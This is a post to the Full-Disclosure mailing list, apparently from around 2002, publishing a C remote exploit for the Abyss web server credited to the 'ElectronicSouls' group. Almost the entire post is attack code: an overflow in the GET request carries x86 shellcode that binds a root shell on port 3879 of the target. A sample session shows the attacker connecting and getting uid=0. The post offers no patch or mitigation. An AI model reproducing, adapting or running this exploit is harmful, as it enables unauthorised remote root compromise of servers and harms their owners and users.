-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Here is a 0day remote exploit for the Abyss webserver.

# cat ESAby-not-finished.c
/*
 * CONFIDENTIAL SOURCE MATERIALS OF THE ElectronicSouls
 * KEEP THIS PRIVATE ! DO NOT LEAVE COPY'S ON UNPROTECTED SYSTEMS !
 *
 * ElectronicSouls ABYSS Remote Exploit
 * (C) BrainStorm - November 2001
 *
 * ABYSS aims to be a fully HTTP/1.1 compliant Web server.
 * Its main design goals are speed, low resource usage and portability.
 * ABYSS works on most UNIX based systems..
 * it seems that the GET and maybe also the HEAD command have exploitable
 * buffer overflows and maybe format strings..
 * this is pre-alpha c0de to future test this bugs.
 * DO NOT DISTRIBUTE THIS FILE !!
 *
 * [usersys ~]$ ./aby2 xxx.xxx.xxx.xxx 80
 * Abyss httpd Exploit by BrainStorm ((ElectronicSouls))
 *
 * - Genetrating overflow packet..
 * - Overflow packet generated.
 * - Connecting ...
 * - transmitting exploit code...
 * Connect to port 3879 on victim host...enjoy ;>
 * [usersys ~]$ telnet xxx.xxx.xxx.xxx 3879
 * Trying xxx.xxx.xxx.xxx...
 * Connected to xxx.xxx.xxx.xxx..
 * Escape character is '^]'.
 * id;
 * uid=0(root) gid=0(root) groups=0(root)
 *
 * Note! for now my status is: sometimes it works sometimes not,
 * more research needs to be done and some more test systems would be nice too..
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

#define ES 157

struct in_addr victim;
  char overflow[4100];

char shellcode[] = // bind a shell to port 3879

"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

int overflowed(char *ret)
{
    int i;

    memset(overflow, 0, sizeof(overflow));
    strcpy(overflow,"GET /");
    printf("- Genetrating overflow packet..\n");
    for(i=0;i<(ES-(strlen(shellcode))); i++)
    {
    strcat(overflow,"\x90");
    }
    strcat(overflow, shellcode);
    strcat(overflow, ret);
    strcat(overflow, ret);
    printf("- Overflow packet generated.\n");
}

int env(struct in_addr addr,char *cport)
{
    struct sockaddr_in serv;
    int s;

    int port=atoi(cport);

    s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    bzero(&serv,sizeof(serv));

    memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr));
    printf("- Connecting ... \n");
    serv.sin_port=htons(port);
    serv.sin_family=AF_INET;

    if (connect(s,(struct sockaddr*)&serv,sizeof(serv)) < 0)
    {
    perror("connect");
    exit(0);
    }
    printf("- transmitting exploit code...\n");
    write(s,overflow,strlen(overflow));
    write(s,"\n\n",2);
    close(s);
}

int host_to_ip(char *hostname,struct in_addr *addr)
{
 struct hostent *res;
 res=gethostbyname(hostname);

 if (res==NULL)
 return(0);

 memcpy((char *)addr,res->h_addr,res->h_length);
 return(1);
}

int main(int argc, char **argv)
{
    char ret[8], serv[256], port[8];
    printf("Abyss httpd Exploit by BrainStorm ((ElectronicSouls)) \n\n");

    if(argc<2)
    {
     printf("Usage : %s <IP> [port]\n",argv[0]);
     exit(0);
    }
    if(argc==3)
    {
     strncpy(port, argv[2], 7);
    }
    else
    {
     strcpy(port, "80\0");
    }
    strcpy(ret, "\xbf\xff\xf9\x70");
    strncpy(serv, argv[1], sizeof(serv)-1);
    overflowed(ret);
    if (!host_to_ip(serv,&victim))
    {
     fprintf(stderr,"Hostname lookup failure\n");
     exit(0);
    }
    env(victim,port);
    printf("Here we go..now connect to port 3879 on victim host and see if it worked...enjoy ;> \n");
    exit(0);
}

#

Thanks to tfish for helping me out with this one.

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"We copyright our code."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3n2rEMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltNSEAmgN9D4DaWj6H
/a6LYyPOk4V81T9sAJ98kPZN3wLRbGArDF7AOrBYZAnlXw==
=V340
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]